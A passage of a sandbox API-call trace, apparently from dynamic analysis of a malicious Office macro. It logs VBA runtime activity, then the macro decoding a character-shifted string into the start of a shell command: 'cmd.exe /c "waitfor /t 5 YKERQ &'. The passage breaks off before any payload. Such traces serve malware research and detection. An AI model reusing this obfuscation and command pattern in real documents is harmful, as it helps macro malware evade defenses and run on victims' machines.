(This=0x7fefe9e5380, cb=0x230) returned 0xbcbcde0 [0017.120] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x6ba0000 [0017.121] IMalloc:Free (This=0x7fefe9e5380, pv=0x78a2570) [0017.121] SetErrorMode (uMode=0x8001) returned 0x8001 [0017.121] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0017.122] SetErrorMode (uMode=0x8001) returned 0x8001 [0017.122] GetProcAddress (hModule=0x7fef0ca0000, lpProcName=0x258) returned 0x7fef0d9c6fc [0017.122] SetErrorMode (uMode=0x8001) returned 0x8001 [0017.122] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0017.122] SetErrorMode (uMode=0x8001) returned 0x8001 [0017.123] GetProcAddress (hModule=0x7fef0ca0000, lpProcName=0x253) returned 0x7fef0f94a40 [0017.123] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x810) returned 0x5520490 [0017.125] IMalloc:Free (This=0x7fefe9e5380, pv=0x78a2630) [0017.125] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x810) returned 0x5520490 [0017.126] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid") returned 0x10b3dc [0017.126] IMalloc:Alloc (This=0x7fefe9e5380, cb=0xb) returned 0x797cf40 [0017.126] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Mid") returned 0x1070ed [0017.126] strcpy_s (in: _Dst=0x284ff0, _DstSize=0xb, _Src="_B_var_Mid" | out: _Dst="_B_var_Mid") returned 0x0 [0017.126] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x284ff0, cbMultiByte=11, lpWideCharStr=0x284e40, cchWideChar=11 | out: lpWideCharStr="_B_var_Mid") returned 11 [0017.126] IUnknown:AddRef (This=0x788e200) returned 0xe [0017.126] ITypeLib:RemoteIsName (in: This=0x788e200, szNameBuf="_B_var_Mid", lHashVal=0x1070ed, pfName=0x284f10, pBstrLibName=0x284e40 | out: pfName=0x284f10*=1, pBstrLibName=0x284e40) returned 0x0 [0017.126] IUnknown:Release (This=0x788e200) returned 0xd [0017.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_B_var_Mid", cchWideChar=-1, lpMultiByteStr=0x284ff0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_B_var_Mid", lpUsedDefaultChar=0x0) returned 11 [0017.126] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Mid") returned 0x1070ed [0017.126] IUnknown:AddRef (This=0x788e200) returned 0xe [0017.126] IUnknown:Release (This=0x788e200) returned 0xd [0017.127] IMalloc:Free (This=0x7fefe9e5380, pv=0x797cf40) [0017.127] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x26d) returned 0xbcb0340 [0017.127] IMalloc:Free (This=0x7fefe9e5380, pv=0xbcb0340) [0017.127] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x26d) returned 0xbcb0340 [0017.127] IMalloc:Free (This=0x7fefe9e5380, pv=0xbcb0340) [0017.127] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x230) returned 0xbcbd030 [0017.128] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Chr") returned 0x107e4b [0017.128] strcpy_s (in: _Dst=0x284e40, _DstSize=0x4, _Src="Chr" | out: _Dst="Chr") returned 0x0 [0017.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x284e40, cbMultiByte=4, lpWideCharStr=0x284c90, cchWideChar=4 | out: lpWideCharStr="Chr") returned 4 [0017.128] IUnknown:AddRef (This=0x788e200) returned 0x11 [0017.128] ITypeLib:RemoteIsName (in: This=0x788e200, szNameBuf="Chr", lHashVal=0x107e4b, pfName=0x284d60, pBstrLibName=0x284c90 | out: pfName=0x284d60*=1, pBstrLibName=0x284c90) returned 0x0 [0017.128] IUnknown:Release (This=0x788e200) returned 0x10 [0017.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Chr", cchWideChar=-1, lpMultiByteStr=0x284e40, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Chr", lpUsedDefaultChar=0x0) returned 4 [0017.128] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Chr") returned 0x107e4b [0017.128] IMalloc:Alloc (This=0x7fefe9e5380, cb=0xb) returned 0x797cf40 [0017.128] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Chr") returned 0x103b5c [0017.128] strcpy_s (in: _Dst=0x284ff0, _DstSize=0xb, _Src="_B_var_Chr" | out: _Dst="_B_var_Chr") returned 0x0 [0017.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x284ff0, cbMultiByte=11, lpWideCharStr=0x284e40, cchWideChar=11 | out: lpWideCharStr="_B_var_Chr") returned 11 [0017.128] IUnknown:AddRef (This=0x788e200) returned 0x11 [0017.128] ITypeLib:RemoteIsName (in: This=0x788e200, szNameBuf="_B_var_Chr", lHashVal=0x103b5c, pfName=0x284f10, pBstrLibName=0x284e40 | out: pfName=0x284f10*=1, pBstrLibName=0x284e40) returned 0x0 [0017.128] IUnknown:Release (This=0x788e200) returned 0x10 [0017.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_B_var_Chr", cchWideChar=-1, lpMultiByteStr=0x284ff0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_B_var_Chr", lpUsedDefaultChar=0x0) returned 11 [0017.128] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Chr") returned 0x103b5c [0017.128] IUnknown:AddRef (This=0x788e200) returned 0x11 [0017.128] IUnknown:Release (This=0x788e200) returned 0x10 [0017.128] IMalloc:Free (This=0x7fefe9e5380, pv=0x797cf40) [0017.128] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x26d) returned 0xbcb0340 [0017.128] IMalloc:Free (This=0x7fefe9e5380, pv=0xbcb0340) [0017.129] IMalloc:Free (This=0x7fefe9e5380, pv=0x78a25d0) [0017.129] SetErrorMode (uMode=0x8001) returned 0x8001 [0017.129] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0017.129] SetErrorMode (uMode=0x8001) returned 0x8001 [0017.130] GetProcAddress (hModule=0x7fef0ca0000, lpProcName=0x278) returned 0x7fef0ddfe60 [0017.130] SetErrorMode (uMode=0x8001) returned 0x8001 [0017.130] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0017.130] SetErrorMode (uMode=0x8001) returned 0x8001 [0017.130] GetProcAddress (hModule=0x7fef0ca0000, lpProcName=0x204) returned 0x7fef0de17b0 [0017.130] SetErrorMode (uMode=0x8001) returned 0x8001 [0017.130] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0017.130] SetErrorMode (uMode=0x8001) returned 0x8001 [0017.131] GetProcAddress (hModule=0x7fef0ca0000, lpProcName=0x260) returned 0x7fef0de142c [0017.132] SafeArrayAllocDescriptorEx (in: vt=0x3, cDims=0x1, ppsaOut=0x7a55690 | out: ppsaOut=0x7a55690) returned 0x0 [0017.132] SafeArrayAllocData (psa=0x7818170) returned 0x0 [0017.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="f\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7832168, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0017.133] VarBstrCat (in: bstrLeft=0x0, bstrRight="c", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7832168, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0017.133] VarBstrCat (in: bstrLeft="c", bstrRight="m", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="g", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="g\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7831c88, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0017.133] VarBstrCat (in: bstrLeft="cm", bstrRight="d", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="1", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="1\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7556228, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0017.133] VarBstrCat (in: bstrLeft="cmd", bstrRight=".", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="h", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="h\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7832168, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0017.133] VarBstrCat (in: bstrLeft="cmd.", bstrRight="e", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7831c88, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0017.133] VarBstrCat (in: bstrLeft="cmd.e", bstrRight="x", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="h", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="h\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7556228, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0017.133] VarBstrCat (in: bstrLeft="cmd.ex", bstrRight="e", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7832168, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0017.134] VarBstrCat (in: bstrLeft="cmd.exe", bstrRight=" ", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7831c88, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0017.134] VarBstrCat (in: bstrLeft="cmd.exe ", bstrRight="/", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="f\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7556228, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0017.134] VarBstrCat (in: bstrLeft="cmd.exe /", bstrRight="c", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7832168, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0017.134] VarBstrCat (in: bstrLeft="cmd.exe /c", bstrRight=" ", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="%", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="%\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7831c88, cchWideChar=1 | out: lpWideCharStr="\"") returned 1 [0017.134] VarBstrCat (in: bstrLeft="cmd.exe /c ", bstrRight="\"", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="z", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="z\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7556228, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0017.134] VarBstrCat (in: bstrLeft="cmd.exe /c \"", bstrRight="w", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7556228, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0017.134] VarBstrCat (in: bstrLeft="cmd.exe /c \"w", bstrRight="a", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7556228, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0017.134] VarBstrCat (in: bstrLeft="cmd.exe /c \"wa", bstrRight="i", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="w", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="w\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7556228, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0017.134] VarBstrCat (in: bstrLeft="cmd.exe /c \"wai", bstrRight="t", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.135] VarBstrCat (in: bstrLeft=0x0, bstrRight="cmd.exe /c \"wait", pbstrResult=0x286a80 | out: pbstrResult=0x286a80) returned 0x0 [0017.135] SafeArrayAllocData (psa=0x7818170) returned 0x0 [0017.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7556228, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0017.135] VarBstrCat (in: bstrLeft=0x0, bstrRight="f", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7556228, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0017.135] VarBstrCat (in: bstrLeft="f", bstrRight="o", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7832168, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0017.135] VarBstrCat (in: bstrLeft="fo", bstrRight="r", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7831c88, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0017.135] VarBstrCat (in: bstrLeft="for", bstrRight=" ", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7556228, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0017.135] VarBstrCat (in: bstrLeft="for ", bstrRight="/", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="w", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="w\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7832168, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0017.135] VarBstrCat (in: bstrLeft="for /", bstrRight="t", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7831c88, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0017.135] VarBstrCat (in: bstrLeft="for /t", bstrRight=" ", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7556228, cchWideChar=1 | out: lpWideCharStr="5") returned 1 [0017.136] VarBstrCat (in: bstrLeft="for /t ", bstrRight="5", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7832168, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0017.136] VarBstrCat (in: bstrLeft="for /t 5", bstrRight=" ", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7831c88, cchWideChar=1 | out: lpWideCharStr="Y") returned 1 [0017.136] VarBstrCat (in: bstrLeft="for /t 5 ", bstrRight="Y", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7556228, cchWideChar=1 | out: lpWideCharStr="K") returned 1 [0017.136] VarBstrCat (in: bstrLeft="for /t 5 Y", bstrRight="K", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="H", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="H\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7832168, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0017.136] VarBstrCat (in: bstrLeft="for /t 5 YK", bstrRight="E", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="U", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="U\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7831c88, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0017.136] VarBstrCat (in: bstrLeft="for /t 5 YKE", bstrRight="R", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="T", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="T\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7831c88, cchWideChar=1 | out: lpWideCharStr="Q") returned 1 [0017.136] VarBstrCat (in: bstrLeft="for /t 5 YKER", bstrRight="Q", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7831c88, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0017.136] VarBstrCat (in: bstrLeft="for /t 5 YKERQ", bstrRight=" ", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=")", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=")\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7831c88, cchWideChar=1 | out: lpWideCharStr="&") returned 1 [0017.137] VarBstrCat (in: bstrLeft="for /t 5 YKERQ ", bstrRight="&", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.137] WideCharToMultiByte (in: CodePage=0x0, 